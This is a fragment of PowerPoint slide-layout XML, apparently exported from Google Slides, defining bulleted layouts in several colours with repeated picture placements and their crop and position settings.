          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1644" name="Google Shape;1644;p86"/>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8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46" name="Google Shape;1646;p8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647" name="Google Shape;1647;p8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648" name="Google Shape;1648;p8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649" name="Google Shape;1649;p8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650" name="Google Shape;1650;p8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51" name="Google Shape;1651;p86"/>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52" name="Google Shape;1652;p86"/>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86"/>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86"/>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86"/>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56" name="Google Shape;1656;p86"/>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57" name="Google Shape;1657;p86"/>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58" name="Google Shape;1658;p86"/>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86"/>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660" name="Google Shape;1660;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1661" name="Google Shape;1661;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1662" name="Google Shape;1662;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1663" name="Google Shape;1663;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1664" name="Google Shape;1664;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>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35. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1665"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1666" name="Google Shape;1666;p87"/>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8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68" name="Google Shape;1668;p8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669" name="Google Shape;1669;p8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670" name="Google Shape;1670;p8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671" name="Google Shape;1671;p8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672" name="Google Shape;1672;p8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73" name="Google Shape;1673;p87"/>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74" name="Google Shape;1674;p87"/>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87"/>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87"/>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87"/>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87"/>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87"/>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80" name="Google Shape;1680;p87"/>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81" name="Google Shape;1681;p87"/>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82" name="Google Shape;1682;p87"/>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83" name="Google Shape;1683;p87"/>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684" name="Google Shape;1684;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1685" name="Google Shape;1685;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1686" name="Google Shape;1686;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1687" name="Google Shape;1687;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1688" name="Google Shape;1688;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1689" name="Google Shape;1689;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>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36. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1690"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1691" name="Google Shape;1691;p88"/>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8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93" name="Google Shape;1693;p8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694" name="Google Shape;1694;p8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695" name="Google Shape;1695;p8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696" name="Google Shape;1696;p8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697" name="Google Shape;1697;p8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98" name="Google Shape;1698;p88"/>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99" name="Google Shape;1699;p88"/>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88"/>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88"/>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88"/>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88"/>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88"/>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05" name="Google Shape;1705;p88"/>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06" name="Google Shape;1706;p88"/>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07" name="Google Shape;1707;p88"/>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08" name="Google Shape;1708;p88"/>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709" name="Google Shape;1709;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1710" name="Google Shape;1710;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1711" name="Google Shape;1711;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1712" name="Google Shape;1712;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1713" name="Google Shape;1713;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1714" name="Google Shape;1714;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577804"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37. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1715"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1716" name="Google Shape;1716;p89"/>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8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18" name="Google Shape;1718;p8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719" name="Google Shape;1719;p8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720" name="Google Shape;1720;p8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721" name="Google Shape;1721;p8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722" name="Google Shape;1722;p8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23" name="Google Shape;1723;p89"/>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24" name="Google Shape;1724;p89"/>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89"/>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89"/>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89"/>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89"/>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89"/>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30" name="Google Shape;1730;p89"/>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31" name="Google Shape;1731;p89"/>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32" name="Google Shape;1732;p89"/>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33" name="Google Shape;1733;p89"/>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734" name="Google Shape;1734;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1735" name="Google Shape;1735;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1736" name="Google Shape;1736;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1737" name="Google Shape;1737;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1738" name="Google Shape;1738;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1739" name="Google Shape;1739;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>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38. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1740"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1741" name="Google Shape;1741;p90"/>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9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43" name="Google Shape;1743;p9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744" name="Google Shape;1744;p9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745" name="Google Shape;1745;p9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746" name="Google Shape;1746;p9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747" name="Google Shape;1747;p9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48" name="Google Shape;1748;p90"/>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49" name="Google Shape;1749;p90"/>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90"/>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90"/>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90"/>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90"/>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90"/>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55" name="Google Shape;1755;p90"/>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56" name="Google Shape;1756;p90"/>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57" name="Google Shape;1757;p90"/>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58" name="Google Shape;1758;p90"/>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759" name="Google Shape;1759;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1760" name="Google Shape;1760;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1761" name="Google Shape;1761;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1762" name="Google Shape;1762;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1763" name="Google Shape;1763;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1764" name="Google Shape;1764;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>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39. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1765"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1766" name="Google Shape;1766;p91"/>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9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68" name="Google Shape;1768;p9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769" name="Google Shape;1769;p9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770" name="Google Shape;1770;p9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771" name="Google Shape;1771;p9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772" name="Google Shape;1772;p9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73" name="Google Shape;1773;p91"/>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74" name="Google Shape;1774;p91"/>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91"/>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76" name="Google Shape;1776;p91"/>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91"/>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78" name="Google Shape;1778;p91"/>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91"/>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80" name="Google Shape;1780;p91"/>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91"/>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82" name="Google Shape;1782;p91"/>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91"/>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84" name="Google Shape;1784;p91"/>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91"/>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786" name="Google Shape;1786;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1787" name="Google Shape;1787;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1788" name="Google Shape;1788;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1789" name="Google Shape;1789;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1790" name="Google Shape;1790;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1791" name="Google Shape;1791;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1390"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1792" name="Google Shape;1792;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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9. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Google Shape;77;p10"/>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78" name="Google Shape;78;p10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
